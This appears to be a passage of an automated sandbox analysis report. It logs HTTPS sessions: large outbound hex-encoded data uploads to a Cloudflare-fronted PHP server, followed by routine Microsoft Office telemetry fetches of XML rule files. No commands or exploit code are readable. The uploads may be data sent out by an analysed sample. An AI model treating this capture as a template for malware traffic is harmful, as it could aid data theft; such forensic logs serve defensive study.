                                                                                                                                                                      2024-11-21 05:23:29 UTC15331OUTData Raw: d6 03 9e 8e 56 ba a9 58 0a ae bc 19 8e 9f ba 51 c3 8c 40 00 9b af 7f 13 83 c6 af cb 2b 39 74 80 03 91 5e d4 c0 cb 98 af 4a e0 48 d1 d2 8d f4 d9 8c 4a 0a 3f 94 c9 5e 4b 4e 89 cf f1 de 70 9c f0 11 f6 c7 80 f1 f6 88 85 bf 2d 94 68 2b 7f 51 45 4d 6f 8c 30 97 c2 84 fe 63 1e 5e 48 f3 f6 1b 5d b9 cd b8 ac 49 a3 72 9e 01 ff 0b 3b ad d3 7b 80 46 c2 fc 8d a0 02 57 d6 0e 6a 55 09 1c dd 2d 99 79 8e 13 08 6b dd 21 72 d2 ac d6 15 81 86 9e d8 c8 f1 e0 bd 9c 7b c3 43 95 5a 20 87 64 4d c4 32 8d 44 d3 fc 3a cf 4b c5 ae 10 17 56 ed 64 34 0a ef 6e bc 36 7d 92 d0 ea 56 d5 52 ff 69 66 f5 98 73 3a f9 97 9d ff f6 19 87 b4 72 13 ce 15 af b0 e0 4d 66 4a ba 79 15 43 c9 48 29 c1 89 d8 b9 d5 7e 77 a6 5d 86 cd 66 fd 87 e6 a2 eb 14 24 fd 9a 1b 85 0f 24 0f 0e a7 fe 45 72 aa 8c 29 6c 8c
                                                                                                                                                                      Data Ascii: VXQ@+9t^JHJ?^KNp-h+QEMo0c^H]Ir;{FWjU-yk!r{CZ dM2D:KVd4n6}VRifs:rMfJyCH)~w]f$$Er)l
                                                                                                                                                                      2024-11-21 05:23:29 UTC15331OUTData Raw: 5a 5c fa cf 29 ba bd 83 b9 ff 60 83 e1 81 ac 7b 54 77 08 83 7a 45 89 33 6e 71 fc 4a 22 a0 92 08 68 5b 57 51 7a 2a 55 87 b7 9b 32 9b 96 34 7c de bb ba 3f 88 15 fb ff 95 40 f9 34 ff 3f 7e 6f d3 ff ec 98 c0 ce 5e 2d 20 7b 61 77 00 16 41 77 bc e0 cc 6f fb 04 49 7a 82 0e 3b 7b c2 48 d4 7e a6 36 a3 fb f1 f5 fe 7a 61 69 db 8f da 75 74 8d 03 c2 24 ca 53 15 d1 f2 5b 0e 98 e5 1b 47 18 8e 10 ce 71 e9 78 64 d8 37 e1 1c b0 f8 e5 8f a2 04 e4 49 c1 ff fb 1b da 4c 33 b9 c2 19 b2 e5 2a c3 b6 60 4f 7b 40 9e 31 10 13 cb 4f af 51 8d e1 02 05 0e 25 35 7c 07 01 90 28 d1 42 8b cc a6 c0 50 bd 2b 13 c3 1d 36 19 ff 49 87 c6 6d b7 3f 0d 8f dc 29 e7 e3 be 1f 4d b7 4c 24 f0 93 70 58 64 44 e9 b4 cd 20 7c 91 17 ba 2a 6a 7b 03 3a e7 2c 98 d9 ba 53 c4 eb 49 42 32 e7 52 89 7c 10 df 57 9a
                                                                                                                                                                      Data Ascii: Z\)`{TwzE3nqJ"h[WQz*U24|?@4?~o^- {awAwoIz;{H~6zaiut$S[Gqxd7IL3*`O{@1OQ%5|(BP+6Im?)ML$pXdD |*j{:,SIB2R|W
                                                                                                                                                                      2024-11-21 05:23:29 UTC15331OUTData Raw: d3 fc fe de 1a f6 eb 67 04 eb 81 61 21 9f 8a bd c9 c4 f4 30 aa 70 f7 d8 c6 9c 5e 27 d7 98 7c 4a ea 6e 6d f2 58 3c f9 b0 62 ed a4 90 ec eb c9 80 a5 f7 67 62 39 b7 72 bb 16 dd 20 f0 d2 04 5c 8b 86 47 90 51 7e ec f5 95 97 61 de 77 26 eb 45 f2 3c 9e 61 43 8f ed bd 51 7d 0b 68 fe e1 3b 35 6f b7 4c 2d 3a fb 8b ad c4 b6 05 29 a8 60 80 d0 f9 c8 08 09 8e f8 43 10 e0 b3 fc 92 a5 11 6e 54 d1 d3 ba 9e 1b de 27 7c 72 55 3e de 87 e7 52 7b d1 30 3e ed 66 20 1a f5 eb b2 f8 40 18 2f b0 d7 7e 41 c4 c0 e5 85 d8 9e 0c f3 08 c1 de 11 9d 61 f9 6d 34 c7 5d ca c8 d0 e0 75 de 8c 11 a6 41 12 c1 00 7b 7d 4e 07 80 26 f0 05 e8 df bc 4b 77 66 49 e8 7f a7 0a b2 f1 28 05 04 df 41 6f 70 16 06 68 5e d4 30 42 60 85 4f 02 bc 57 3a ea df d1 77 cc 81 7b cd 07 ea fd c6 f5 84 4b e3 69 db 0f 85
                                                                                                                                                                      Data Ascii: ga!0p^'|JnmX<bgb9r \GQ~aw&E<aCQ}h;5oL-:)`CnT'|rU>R{0>f @/~Aam4]uA{}N&KwfI(Aoph^0B`OW:w{Ki
                                                                                                                                                                      2024-11-21 05:23:33 UTC994INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:33 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Set-Cookie: PHPSESSID=rmhj34bs90qgg8bp0hjspqm4h7; expires=Sun, 16-Mar-2025 23:10:10 GMT; Max-Age=9999999; path=/
                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aMF%2BF%2BqfybF6bLP17fZAptN6LLMFcAk4q%2BJs2MXx82SaVDyJ2dXhED649gDXDcjIscTkueCq3ebGDSNPLx0B08IIt4%2F8jnSbk5Do3yZQ%2BPZvGSAZhm%2B3AYFQLcwCzMZ1"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 8e5e3f7fdad51a28-EWR
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1921&sent=354&recv=589&lost=0&retrans=0&sent_bytes=2829&recv_bytes=572097&delivery_rate=1432074&cwnd=138&unsent_bytes=0&cid=5b51ad7c13ea7e92&ts=3826&x=0"


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      31192.168.2.64974113.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:30 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:30 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 419
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                      ETag: "0x8DC582B9748630E"
                                                                                                                                                                      x-ms-request-id: a56dfe0e-901e-0029-2976-3b274a000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052330Z-1777c6cb754wcxkwhC1TEB3c6w0000000ag000000000prs1
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:30 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      32192.168.2.64974413.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:30 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:30 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:30 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                      ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                      x-ms-request-id: 4eee1f4b-001e-0046-44b2-3bda4b000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052330Z-r1d97b9957789nh9hC1TEBxha80000000a30000000004mvq
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:30 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      33192.168.2.64974213.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:30 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:30 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:30 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 472
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                      ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                      x-ms-request-id: 107b228c-c01e-00a2-1f8c-3a2327000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052330Z-178bfbc474bkvpdnhC1NYCuu2w0000000140000000007epb
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:30 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      34192.168.2.64974313.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:30 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:30 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 404
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                      ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                      x-ms-request-id: 70a27cfc-201e-0051-268c-3a7340000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052330Z-178bfbc474bmqmgjhC1NYCy16c000000015g000000002wsf
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:30 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      35192.168.2.64974613.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:30 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:31 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:31 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 428
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                      ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                      x-ms-request-id: c49e358a-d01e-008e-6463-3b387a000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052331Z-178bfbc474brk967hC1NYCfu6000000000s000000000km56
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:31 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      36192.168.2.64974713.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:32 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:32 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 499
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                                      ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                                      x-ms-request-id: be70ec4e-301e-000c-088c-3a323f000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052332Z-1777c6cb754wcxkwhC1TEB3c6w0000000ag000000000prum
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:32 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      37192.168.2.64974813.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:32 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:32 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 415
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                      ETag: "0x8DC582B988EBD12"
                                                                                                                                                                      x-ms-request-id: 6a83a5f2-e01e-000c-157b-3b8e36000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052332Z-178bfbc474b9fdhphC1NYCac0n00000000wg00000000gw74
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:32 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      38192.168.2.64974913.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:32 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:33 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:32 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 471
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                      ETag: "0x8DC582BB5815C4C"
                                                                                                                                                                      x-ms-request-id: 29297304-901e-0083-6776-3bbb55000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052332Z-1777c6cb754xlpjshC1TEBv8cc0000000aqg00000000ncyw
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
